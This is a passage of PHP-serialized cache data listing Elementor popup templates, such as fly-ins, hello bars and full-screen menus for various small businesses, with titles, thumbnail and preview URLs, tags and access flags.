Shop\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/Merchandise-Shop-39-small.jpg\";s:12:\"tmpl_created\";i:1647509196;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/classic-subscription-merchandise-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Ecommerce\",\"Marketing\",\"Shop\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:27;a:16:{s:4:\"tmpl\";i:1310;s:2:\"id\";i:22643;s:5:\"title\";s:48:\"Fly-In | Contact | Non-Governmental Organization\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/NGO-41-small.jpg\";s:12:\"tmpl_created\";i:1647509528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:150:\"https://library.elementor.com/popups/fly-in-contact-non-governmental-organization/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:11:\"[\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:28;a:16:{s:4:\"tmpl\";i:1311;s:2:\"id\";i:22654;s:5:\"title\";s:35:\"Hello Bar | Contact | Family Doctor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/family-doctor-44-small.jpg\";s:12:\"tmpl_created\";i:1647509732;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/hello-bar-contact-family-doctor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Contact\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:29;a:16:{s:4:\"tmpl\";i:1312;s:2:\"id\";i:22663;s:5:\"title\";s:36:\"Classic | Subscription | Sports Blog\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2022/03/45-sport-blog-Subscription.jpg\";s:12:\"tmpl_created\";i:1647509908;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-subscription-sports-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:16:\"[\"Blog\",\"Sport\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:30;a:16:{s:4:\"tmpl\";i:1313;s:2:\"id\";i:22673;s:5:\"title\";s:30:\"Hello Bar | Booking | Event DJ\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/DJ-service-46-small.jpg\";s:12:\"tmpl_created\";i:1647510160;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/hello-bar-booking-event-dj/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Booking\",\"Events\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:31;a:16:{s:4:\"tmpl\";i:1314;s:2:\"id\";i:22684;s:5:\"title\";s:36:\"Fly-In | Discount | Cleaning Company\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/51-cleaning-company-Discount.jpg\";s:12:\"tmpl_created\";i:1647510546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-cleaning-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Offer\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:32;a:16:{s:4:\"tmpl\";i:1315;s:2:\"id\";i:22693;s:5:\"title\";s:28:\"Fly-In | Contact | Carpenter\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/carpenter-53-small.jpg\";s:12:\"tmpl_created\";i:1647511972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-carpenter/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:33;a:16:{s:4:\"tmpl\";i:1316;s:2:\"id\";i:22703;s:5:\"title\";s:31:\"Classic | Booking | Yoga Studio\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/55-yoga-studio-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647512209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-booking-yoga-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Booking\",\"Contact\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:34;a:16:{s:4:\"tmpl\";i:1317;s:2:\"id\";i:22714;s:5:\"title\";s:37:\"Classic | Discount | Pet Care Company\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/56-Pet-Care-Discount.jpg\";s:12:\"tmpl_created\";i:1647513031;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-pet-care-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:35;a:16:{s:4:\"tmpl\";i:1318;s:2:\"id\";i:22725;s:5:\"title\";s:38:\"Fly-In | Discount | Online Coffee Shop\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/online-coffee-shop-57-small.jpg\";s:12:\"tmpl_created\";i:1647513325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-discount-online-coffee-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Food\",\"Offer\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:36;a:16:{s:4:\"tmpl\";i:1319;s:2:\"id\";i:22737;s:5:\"title\";s:44:\"Fly-In | CTA | Moving &#038; Storage Company\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/moving-company-59-small.jpg\";s:12:\"tmpl_created\";i:1647520956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-moving-storage-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:37;a:16:{s:4:\"tmpl\";i:1320;s:2:\"id\";i:22749;s:5:\"title\";s:47:\"Classic | Contact | Industrial Design Portfolio\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/60-industrial-design-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647528116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/classic-contact-industrial-design-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:40:\"[\"Contact\",\"Interior Design\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:38;a:16:{s:4:\"tmpl\";i:1321;s:2:\"id\";i:22759;s:5:\"title\";s:25:\"Classic | Contact | Drone\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/drone-61-small.jpg\";s:12:\"tmpl_created\";i:1647528899;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-contact-drone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:39;a:16:{s:4:\"tmpl\";i:1322;s:2:\"id\";i:22768;s:5:\"title\";s:46:\"Full Screen | Menu | Fashion Stylist Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/62-Fashion-Stylist-Menu.jpg\";s:12:\"tmpl_created\";i:1647529434;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/full-screen-menu-fashion-stylist-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Fashion\",\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:40;a:16:{s:4:\"tmpl\";i:1323;s:2:\"id\";i:22780;s:5:\"title\";s:31:\"Fly-In | CTA | Landscape Design\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/64-Landscape-Design-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647530337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-landscape-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:41;a:16:{s:4:\"tmpl\";i:1324;s:2:\"id\";i:22790;s:5:\"title\";s:48:\"Bottom Bar  | Contact | Architecture Photography\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/architecture-photography-65-small.jpg\";s:12:\"tmpl_created\";i:1647532358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/bottom-bar-contact-architecture-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:26:\"[\"Architecture\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:42;a:16:{s:4:\"tmpl\";i:1325;s:2:\"id\";i:22800;s:5:\"title\";s:41:\"Fly-In  | CTA | Speech-Language Therapist\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/66-Speech-Language-Therapist-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647532720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/fly-in-cta-speech-language-therapist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:25:\"[\"cta\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:43;a:16:{s:4:\"tmpl\";i:1326;s:2:\"id\";i:22812;s:5:\"title\";s:35:\"Full Screen | Verification | Winery\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/67-Winery-Verification.jpg\";s:12:\"tmpl_created\";i:1647761384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/full-screen-verification-winery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:24:\"[\"Alert\",\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:44;a:16:{s:4:\"tmpl\";i:1327;s:2:\"id\";i:22822;s:5:\"title\";s:36:\"Fly-In | Subscription | Nutritionist\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/nutritionist-69-small.jpg\";s:12:\"tmpl_created\";i:1647762620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-subscription-nutritionist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Food\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:45;a:16:{s:4:\"tmpl\";i:1328;s:2:\"id\";i:22833;s:5:\"title\";s:40:\"Classic | Subscription | App &#038; SaaS\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/app-70-small.jpg\";s:12:\"tmpl_created\";i:1647762955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscription-app-saas/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:14:\"[\"App\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:46;a:16:{s:4:\"tmpl\";i:1329;s:2:\"id\";i:22844;s:5:\"title\";s:41:\"Bottom Bar | Discount | Handmade Cupcakes\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/72-Handmade-Cupcakes-Discount.jpg\";s:12:\"tmpl_created\";i:1647763350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-cupcakes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:21:\"[\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:47;a:16:{s:4:\"tmpl\";i:1330;s:2:\"id\";i:22855;s:5:\"title\";s:40:\"Bottom Bar | Subscription | Fashion Blog\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-blog-75-small.jpg\";s:12:\"tmpl_created\";i:1647763907;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/bottom-bar-subscription-fashion-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:30:\"[\"Blog\",\"Fashion\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:48;a:16:{s:4:\"tmpl\";i:1331;s:2:\"id\";i:22866;s:5:\"title\";s:28:\"Fly-In | CTA | Private Tutor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-77-small.jpg\";s:12:\"tmpl_created\";i:1647764062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-cta-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:49;a:16:{s:4:\"tmpl\";i:1332;s:2:\"id\";i:22876;s:5:\"title\";s:30:\"Classic | CTA | Tennis Academy\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/78-Tennis-Academy-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765192;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-tennis-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:50;a:16:{s:4:\"tmpl\";i:1333;s:2:\"id\";i:22887;s:5:\"title\";s:31:\"Fly-In | CTA | Shared Workspace\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/shared-workspace-79-small.jpg\";s:12:\"tmpl_created\";i:1647765419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-shared-workspace/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Business\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:51;a:16:{s:4:\"tmpl\";i:1334;s:2:\"id\";i:22899;s:5:\"title\";s:30:\"Bottom Bar | CTA | Art Gallery\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/80-Art-Gallery-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765652;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/bottom-bar-cta-art-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:13:\"[\"Art\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:52;a:16:{s:4:\"tmpl\";i:1335;s:2:\"id\";i:22910;s:5:\"title\";s:44:\"Fly-In | Subscription | Hiking Tours Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/hiking-tours-company-81-small.jpg\";s:12:\"tmpl_created\";i:1647765835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscription-hiking-tours-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Subscribe\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:53;a:16:{s:4:\"tmpl\";i:1336;s:2:\"id\";i:22921;s:5:\"title\";s:26:\"Classic | CTA | Music Band\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/music-band-82-small.jpg\";s:12:\"tmpl_created\";i:1647769462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/classic-cta-music-band/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Marketing\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:54;a:16:{s:4:\"tmpl\";i:1337;s:2:\"id\";i:22935;s:5:\"title\";s:35:\"Classic | CTA | Computer Technician\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/comuter-technician-83-small.jpg\";s:12:\"tmpl_created\";i:1647769843;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-computer-technician/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:55;a:16:{s:4:\"tmpl\";i:1338;s:2:\"id\";i:22945;s:5:\"title\";s:37:\"Classic | Discount | Delivery Company\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/delivery-company-88-small.jpg\";s:12:\"tmpl_created\";i:1647770834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-delivery-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Discount\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:56;a:16:{s:4:\"tmpl\";i:1339;s:2:\"id\";i:22959;s:5:\"title\";s:29:\"Classic | Discount | Eco Shop\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/echo-shop-89-small.jpg\";s:12:\"tmpl_created\";i:1647771211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-discount-eco-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:57;a:16:{s:4:\"tmpl\";i:1340;s:2:\"id\";i:22972;s:5:\"title\";s:54:\"Fly-In | Subscription | Health &#038; Mindfulness Blog\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small.jpg\";s:12:\"tmpl_created\";i:1647771461;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/fly-in-subscription-health-mindfulness-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:21:\"[\"Health\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:58;a:16:{s:4:\"tmpl\";i:1341;s:2:\"id\";i:22982;s:5:\"title\";s:31:\"Full Screen | Menu | Art Museum\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/art-museum-112-small.jpg\";s:12:\"tmpl_created\";i:1647771938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-art-museum/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:59;a:16:{s:4:\"tmpl\";i:1342;s:2:\"id\";i:22992;s:5:\"title\";s:40:\"Classic | Discount | Urban Clothing Shop\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small-1.jpg\";s:12:\"tmpl_created\";i:1647773067;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/classic-discount-urban-clothing-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Discount\",\"Ecommerce\",\"Fashion\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:60;a:16:{s:4:\"tmpl\";i:1343;s:2:\"id\";i:23004;s:5:\"title\";s:60:\"Full Screen | Menu | Digital &#038; Technology Design 